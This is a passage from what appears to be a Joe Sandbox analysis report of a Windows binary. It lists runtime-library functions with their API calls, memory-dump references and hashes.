                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 3109751735-1866435925
                                                      • Opcode ID: 6c7322e2444b7a39d4ea92f6e633540b6b1c3ee485891c7995d0d4cef8a7309e
                                                      • Instruction ID: ed34833b234aa8f348023a12daf5a883145e6696b3060325242fa3cfc1ceadd2
                                                      • Opcode Fuzzy Hash: 6c7322e2444b7a39d4ea92f6e633540b6b1c3ee485891c7995d0d4cef8a7309e
                                                      • Instruction Fuzzy Hash: 18110AB2900B046BC710DF18DC41B9AB3D8AF45321F58862AFF59DB682F774E948DB91
                                                      Function 00F5F5B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00F5F563,00000000,00000001,00F8B918,?,?,?,00F5F706,00000004,InitializeCriticalSectionEx,00F7BDF0,InitializeCriticalSectionEx), ref: 00F5F5BF
                                                      • GetLastError.KERNEL32(?,00F5F563,00000000,00000001,00F8B918,?,?,?,00F5F706,00000004,InitializeCriticalSectionEx,00F7BDF0,InitializeCriticalSectionEx,00000000,?,00F5F4BD), ref: 00F5F5C9
                                                      • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00F5E423), ref: 00F5F5F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID: api-ms-
                                                      • API String ID: 3177248105-2084034818
                                                      • Opcode ID: de262a4a70afafbe8396fc004cb80797d0202a512288f6717349342abd771cc1
                                                      • Instruction ID: c627032153646a4e67ad5758c628a091a59610eee8dd1a63629ca5907ad311d9
                                                      • Opcode Fuzzy Hash: de262a4a70afafbe8396fc004cb80797d0202a512288f6717349342abd771cc1
                                                      • Instruction Fuzzy Hash: 6CE01270A4430AB6DB201F70DC06B583A55AB40B66F254470FA0CB40E1FB61D998B9C6
                                                      Function 00F6A568 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleOutputCP.KERNEL32(8C9F690D,00000000,00000000,00F5FC3C), ref: 00F6A5CB
                                                        • Part of subcall function 00F6EE2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F6CDF6,?,00000000,-00000008), ref: 00F6EED7
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F6A826
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F6A86E
                                                      • GetLastError.KERNEL32 ref: 00F6A911
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                      • String ID:
                                                      • API String ID: 2112829910-0
                                                      • Opcode ID: 8569fe1b27299a2434939b92aba9288bc30049695284fca3178673d1351f7f5d
                                                      • Instruction ID: 71177f1425c1d526ab7e9bb8cf53fd78845ea42b20ffe49ebebb572d6302f028
                                                      • Opcode Fuzzy Hash: 8569fe1b27299a2434939b92aba9288bc30049695284fca3178673d1351f7f5d
                                                      • Instruction Fuzzy Hash: 86D178B5D002489FCB15CFA8D880AADBBB5FF49314F28412AE856F7251E730A942DF51
                                                      Function 00F5E5D1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: d5a33ed23b76ff08183ad8553f85ab5f0cad7e4229ad10fec2595fea53aef81d
                                                      • Instruction ID: 54ff7e9f5561b532df7ed043d01a6fb2683907dfb492abbac7866013571580e6
                                                      • Opcode Fuzzy Hash: d5a33ed23b76ff08183ad8553f85ab5f0cad7e4229ad10fec2595fea53aef81d
                                                      • Instruction Fuzzy Hash: C4510472A003069FDB2D9F14E841BBA7BA4EF58762F14002DEE1587191E735EE48FB90
                                                      Function 00F6F247 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F6EE2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F6CDF6,?,00000000,-00000008), ref: 00F6EED7
                                                      • GetLastError.KERNEL32 ref: 00F6F2AB
                                                      • __dosmaperr.LIBCMT ref: 00F6F2B2
                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 00F6F2EC
                                                      • __dosmaperr.LIBCMT ref: 00F6F2F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 1913693674-0
                                                      • Opcode ID: 02e0b77a2527b0f7111b176ad8450c4b19d1ae6a4d5975cb7dda840f6abad387
                                                      • Instruction ID: 3c4cb7487fbd4d01e803c0150e74a73f59185df23b0c6410accbf7a865601e2d
                                                      • Opcode Fuzzy Hash: 02e0b77a2527b0f7111b176ad8450c4b19d1ae6a4d5975cb7dda840f6abad387
                                                      • Instruction Fuzzy Hash: 2921C272A00305AFDB20AFA1AC8197BB7A9FF54360715853AF81997251D734EC44BB90
                                                      Function 00F64689 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85da9e5399ab113613de2f9de3bfcd1634776a096e1a08702411d6d73ccdd777
                                                      • Instruction ID: 290f73dade0b3a6cc94be3769821d382bdc80208fa74b3c15380ea1a6d712cfd
                                                      • Opcode Fuzzy Hash: 85da9e5399ab113613de2f9de3bfcd1634776a096e1a08702411d6d73ccdd777
                                                      • Instruction Fuzzy Hash: 9C21CD32A00209AFDB20FF60CC80D7BB7AABF523647154528F85897151DB35FC50BBA0
                                                      Function 00F701DD Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00F701E5
                                                        • Part of subcall function 00F6EE2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F6CDF6,?,00000000,-00000008), ref: 00F6EED7
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F7021D
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F7023D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 158306478-0
                                                      • Opcode ID: 095c3464c955e1195ee8213d6886c9e61ab83be23d685937a4eb9b36858659af
                                                      • Instruction ID: f8b3ffaa508d089832e7e05f6cc03e4e1c1d133e1d36cb4049524c1277f00655
                                                      • Opcode Fuzzy Hash: 095c3464c955e1195ee8213d6886c9e61ab83be23d685937a4eb9b36858659af
                                                      • Instruction Fuzzy Hash: 8F1104A7904209FEAA212B715C8DCBF3A6CDF8A3A47510526F90AD1102EE648D02B573
                                                      Function 00F5869B Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F585FC: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,00F5864E,00000014,?,00F5868F,00000014,?,00F52311,00000000,00000014,00000000,00000000), ref: 00F58608
                                                      • __Mtx_unlock.LIBCPMT ref: 00F586E1
                                                      • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,8C9F690D,?,?,?,Function_000292E8,000000FF), ref: 00F58709
                                                      • __Mtx_unlock.LIBCPMT ref: 00F58744
                                                      • __Cnd_broadcast.LIBCPMT ref: 00F58755
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                      • String ID:
                                                      • API String ID: 420990631-0
                                                      • Opcode ID: bd59233eff6a42afe82e8062e5d9273380a3dc7f0717321e3784943e7c083f32
                                                      • Instruction ID: e3ce06478fc31b09c95349c0305ee83aab0802acd8e552167d0137256cf35248
                                                      • Opcode Fuzzy Hash: bd59233eff6a42afe82e8062e5d9273380a3dc7f0717321e3784943e7c083f32
                                                      • Instruction Fuzzy Hash: ED110372900604ABCB117B60AC42A6F77A8EB057B1F14452AFE15A3291DF2CD909FB92
                                                      Function 00F77F86 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000), ref: 00F77F9D
                                                      • GetLastError.KERNEL32(?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C,00F5FC3C,?,00F6AF23,?), ref: 00F77FA9
                                                        • Part of subcall function 00F77F6F: CloseHandle.KERNEL32(FFFFFFFE,00F77FB9,?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C,00F5FC3C), ref: 00F77F7F
                                                      • ___initconout.LIBCMT ref: 00F77FB9
                                                        • Part of subcall function 00F77F31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F77F60,00F759CE,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C), ref: 00F77F44
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00F759E1,00000000,00000001,00000000,00F5FC3C,?,00F6A965,00F5FC3C,00000000,00000000,00F5FC3C), ref: 00F77FCE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 6896b541fd9e764b173c8beadd8f6fcbf22eb21d9ff5e5e7e09c02478cbce024
                                                      • Instruction ID: 4c23aa08432ff4464048d9ec536be6837f7c6ac3cd631f65e9e77569d7e71ed2
                                                      • Opcode Fuzzy Hash: 6896b541fd9e764b173c8beadd8f6fcbf22eb21d9ff5e5e7e09c02478cbce024
                                                      • Instruction Fuzzy Hash: 50F0F836418618BBCF222F91AC04EDE3F66FF487B0B058415FA1D95120D6328960FBD2
                                                      Function 00F5B195 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SleepConditionVariableCS.KERNELBASE(?,00F5B132,00000064), ref: 00F5B1B8
                                                      • LeaveCriticalSection.KERNEL32(00F8B564,00F523F1,?,00F5B132,00000064,?,00000000,000000A8,00F523F1,00F8C0A0,?,00F57026), ref: 00F5B1C2
                                                      • WaitForSingleObjectEx.KERNEL32(00F523F1,00000000,?,00F5B132,00000064,?,00000000,000000A8,00F523F1,00F8C0A0,?,00F57026), ref: 00F5B1D3
                                                      • EnterCriticalSection.KERNEL32(00F8B564,?,00F5B132,00000064,?,00000000,000000A8,00F523F1,00F8C0A0,?,00F57026), ref: 00F5B1DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID:
                                                      • API String ID: 3269011525-0
                                                      • Opcode ID: 8c364e7f076b92b7b1abf439b09d4a7eff69f8b792712222f57015ca99959876
                                                      • Instruction ID: 0bbe454a373bd9965bdd1ad54a529cf6e9eff94e36d3bde05c0a3f9e2dbe608a
                                                      • Opcode Fuzzy Hash: 8c364e7f076b92b7b1abf439b09d4a7eff69f8b792712222f57015ca99959876
                                                      • Instruction Fuzzy Hash: EDE0123254162CA7DA012B60EC19ADD3F25BB49762B090010FA0D5A174C7715944FBD7
                                                      Function 00F640FD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00F6418D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: dabeeac95cf17905bca50c62153568c34b703394b06de1f400539f29dd96d77c
                                                      • Instruction ID: 2efe670885c169da9105ea223c43c5ce738c063b9f1489c92e24a6471644f962
                                                      • Opcode Fuzzy Hash: dabeeac95cf17905bca50c62153568c34b703394b06de1f400539f29dd96d77c
                                                      • Instruction Fuzzy Hash: 8E517E6BE0810596CB12BB14CD5137D3BA4EB91720F304DA9F096862E9EB389CD5BA47
                                                      Function 00F520E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00F5222D
                                                        • Part of subcall function 00F5C0D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F5BE3B,?,?,?,?,00F5BE3B,0000000C,00F88448,0000000C), ref: 00F5C131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                                      • API String ID: 3109751735-1240500531
                                                      • Opcode ID: b2a423ee36a0198b00908e3c296d1832fcda30939d0cd8b3677229d355c3cae4
                                                      • Instruction ID: b9a290942412476df5e04c23579053fa07ae56a8ba1bbc90be0f7e2e8413353e
                                                      • Opcode Fuzzy Hash: b2a423ee36a0198b00908e3c296d1832fcda30939d0cd8b3677229d355c3cae4
                                                      • Instruction Fuzzy Hash: C6412672504700AFC304DF28CC41A9FB7E9AF86321F188A1EFA5597652E734E949DB92
                                                      Function 00F5E2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F5E2FF
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F5E3B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 3480331319-1018135373
                                                      • Opcode ID: f011c1a25f0db3274ff0ffe759717a094914cadf7618662817a9ad823f297159
                                                      • Instruction ID: 23e55d0fdb9d08d17249a9f92eabb77b9d0cb1b7d357666ed6b4b02d555e5471
                                                      • Opcode Fuzzy Hash: f011c1a25f0db3274ff0ffe759717a094914cadf7618662817a9ad823f297159
                                                      • Instruction Fuzzy Hash: 1C41E730E002089BCF14DF68CC84AAE7FB5BF45325F1481A5ED199B392D735DA09DB92
                                                      Function 00F5EBCD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?), ref: 00F5EBF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
